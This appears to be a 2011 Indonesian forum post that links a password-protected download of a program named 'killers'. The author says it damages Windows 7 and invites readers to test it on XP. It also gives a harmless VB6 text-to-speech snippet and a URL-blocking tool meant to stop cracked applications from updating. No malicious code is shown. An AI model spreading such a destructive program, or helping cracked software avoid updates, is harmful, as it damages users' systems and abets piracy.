2011-11-21

Membuat kerusakan lebih mudah

Oleh Dendrif Deo di BUKAN PC +

Membuat kerusakan ternyata sangatlah mudah, lain halnya dengan membenarkan atau membetulkan itu jauh lebih sulit.Ane coba bikin program sederhana yang hanya terdiri dari kurang lebih lima sintax dan work di windows 7 sp 1 ane, tapi ane belum coba di xp kira-kira agan- agan ada yang mau nyoba gak yang pake xp,kalo work di xp buat betulinnya agak susah soalnya waktu ane betulin di windows 7 ane pake hirens 13.1 semua app yang ada di windows 7 gak suport di hirens 13 kalo hirens 15.1 ane belum coba.cobanya buat yang pake DF aja.

programnya ada di sini

http://www...4shared..com/file/PeNntYPw/killers.html

passwordnya: www.dendrif-deo.co.cc[killers]

kalo work di xp jangan disalah gunakan yah....

sekalian nih ada source code buat ngeluarin suara di vb6 ane dapat dari grup artav

===================================================

Private Sub BacaTeks(ByVal TextString As String) 'BacaTeks adalah Nama Perintahnya

    Set SuaraTeks = CreateObject("SAPI.SpVoice") 'Memanggil Fungsi MS.Speech

    Call SuaraTeks.Speak(TextString, SPF_DEFAULT) 'Menghubungkan ke VB6

End Sub

Private Sub Form_Load() 'Tempatnya saya simpan di Form_load,tapi bisa dimana2 kok :)

Dim pesan As String 'Nama Alias untuk Mengeluarkan pesan,Bisa diganti apa aja

pesan = "Hi All member bp+" 'Tulisan yang akan dibaca oleh MS.Speech (Harus Bahasa Inggris)

Call BacaTeks(pesan)  'Memanggil ke Fungsi MS.Speech

End Sub

========================================================

ini ada tambahan tools kecil pemblokir web lumayan biar app cracknya gak update

http://www...4shared...com/file/NQ6E35qq/URLBlock.html

password = www.dendrif-deo.co.cc[urlblock]

========================================================